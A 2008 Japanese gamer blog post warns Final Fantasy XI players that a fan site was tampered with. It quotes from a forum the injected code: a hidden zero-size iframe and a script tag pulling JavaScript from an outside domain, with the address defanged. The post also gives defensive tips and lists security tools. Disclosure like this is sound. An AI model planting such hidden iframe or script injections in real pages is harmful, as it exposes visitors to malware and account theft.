|
以前から言ってますブログテンプレ改ざんの大被害。 超有名なヴァナモンブログ様も改ざんされた経緯がありましたが、 今回はブログでなく、普通のHPの方です。 今朝(30日朝)にメールもらって知ったんだが、 仕事中で報告遅れてスマン! まずチェックを! 4/27(日)23:30〜4/29(火)13:00 この間にヴァナモン閲覧された方、 大至急ウイルススキャンして下さいね! どうやら今回はPOLパス抜くもんじゃなさそうだけど。 以下、掲示板から抜粋。 >ソース見てみた。ヴァナモンひらいてメニューがでてくるがその一番上の >エリア別モンスターデータのリンク先にインラインフレームが埋め込まれてて >その先でs111●cnzz●com/に飛ばされてる。 >アーガスでみたら北京のサイトだった。 >インラインフレーム有効にしてるブラウザで見ないほうがいいね。 >エリア別モンスターサーチのリンク先の >エリア別詳細 と書いてある左上のフレームに ><iframe src=top■htm height=0 width=0></iframe> >が仕込まれてる。top.htmはクラッカーが仕掛けたであろうページで ><script src='http://s111■cnzz■com/stat■php?id=508863&web_id=508863' >language='JavaScript' charset='gb2312'> >がさらに仕込まれている。 ヴァナモン管理人様によると、 3つのファイルが書き換えられ、 今現在はすでに修正済みとのこと。 ブログに留まらず、通常のHPに改ざんが見られるとなると、 今後の被害拡大が心配。 特に今時期、GWに入り、いろいろなところが休業日。 企業側の対応が遅れる可能性も大。 本格的に連休入る前に罠仕掛けてくれたあたり… 多少の救いかヾ(´▽`;)ゝ とりあえず、サポートが当てにならない祝日、 自己防衛しかありませんよ! ブログの時にも言ったけども、 できるだけ、携帯対応サイトは携帯で…。 ・Windows等OSを最新にアップデート。 ・RealPlayer最新版へのアップデート、もしくはアンインストール。 ・アンチウィルスソフトの最新版へのアップデート。 ・インラインフレーム、JavaスクリプトのOFF。 これやってください! 必ずやってください!! 連休中に垢ハックとかしゃれにならん。 FFやるPCではサイト閲覧しないほうがいいかと。 あと、少しでも可能性下げよう。 POLにパス記憶させない! すでに記憶してるのであればパス変更。 毎回手入力にしましょう。 文章がなんか支離滅裂になってるな。 とにかく、今までも週末を狙ってきた業者が、 GWを狙わないはずがない! みんな気をつけてね!! また情報入り次第報告します!('◇')ゞ とりあえずリンク再添付↓ 私の過去ブログ↓ 111.誠に遺憾ながら…(3月14日記事再アップです)→2008/03/22(18:50) 114.お詫びと警告_(。_。)_→2008/03/23(23:09) 115.新情報追加(ウイルスについて)→2008/03/25(23:12) 116.今日は雑談も挟んでみた(´∇`)→2008/03/28(19:57) 117.重要なお知らせ from POL(4月1日、一部修正)→2008/03/29(01:38) きっとFC2最後の記事です。→2008/04/06(02:16) デュナミスボスディンヽ(*´∀`)ノ (下の方に追記でFC2の公式発表あり→2008/04/18(00:42) セキュリティー…誰かなんとかしてクレよ(´;ω;`)→2008/04/18(22:33) 【FF11 ペット狩り黒猫奮闘記】様のブログ↓ ・ウイルス検出について【報告】→2008/3/1(14:24) ・ウイルス検出について【情報追記】→2008/3/5(20:16) ・ウイルス検出について【罠再び!】→2008/3/11(19:50) ・ウイルス検出について【罠、姿を変え】→2008/3/22(15:43) ・ウイルス検出について【現状まとめ】→2008/03/25(19:27) ・ウイルス検出について【FC2、遂に動く!】→2008/04/17(20:13) ・ウイルス検出に関して【GW到来】→2008/04/30(15:45) 以下、ブラウザやツール等。 Mozilla様 →私の使ってるWebブラウザ「Firefox」等 (IEからの引越しは超簡単。IEより安全性高いような気がする?) リネージュ資料室様 →特定のIPアドレス圏からのアクセスをシャットアウトしてくれるソフト (下記のAguse様が役に立ちます) Dr.Web様 →リンクをクリックする前にウイルス・スパムを予測してくれるもの (エンコードされたJavaスクリプトには反応しないことあり) カスペルスキーオンラインスキャン様 →私の知る限り、今回のウイルスに一番早く対応された無料スキャン (無料はスキャンのみで、駆除は製品版で) ※今現在は多くのアンチウイルスソフト様が対応されております マカフィー様 →サイトの安全性を判断してくれるもの (情報提供フォームあり) Aguse様 →URLの入力で、サーバーの管理者、所在地、開設日など調べるサイト (FC2ブログ→ラスベガス、のような結果が地図付きで表示される) URL エンコード-デコードフォーム様 →デコード文字列のエンコード化、またその逆が調べられるサイト (ソース表示で安全確認する際、エンコードされてるのを調べるのに便利) 毎度毎度で申し訳ないんですが、 リンク・抜粋は全て無許可で掲載させていただいてます。 不都合ありましたら即訂正・削除させていただきます。 ご一報くださいm(._.)m |
| << 前記事(2008/04/27) | トップへ | 後記事(2008/05/02)>> |
| タイトル (本文) | ブログ名/日時 |
|---|---|
移転しました&lt;(_ _)&gt;
FC2側の対応に不満を覚えたわたくち、こちらの試用期間2週間をフルに使って移転工事を行い、本日2008/05/01にほぼ完了致しましたので、お知らせと共に、こちらの正式公開とさせて頂きます。 旧Blog「Desirs du monde」へリンク・ブックマークされて頂いていた皆様にはお手.. ...続きを見る |
ぴーろぐ 2008/05/01 05:57 |
| 内 容 | ニックネーム/日時 |
|---|---|
移転完了と共にこちらへのリンクを頂きましたので、ご報告申し上げます。 |
ぴー URL 2008/05/01 05:51 |
ぴー様 |
ロスト 2008/05/01 08:23 |
相変わらず、良く調べているね。 |
たるぼん 2008/05/02 12:45 |
たるぼん様 |
ロスト 2008/05/03 05:10 |
| << 前記事(2008/04/27) | トップへ | 後記事(2008/05/02)>> |
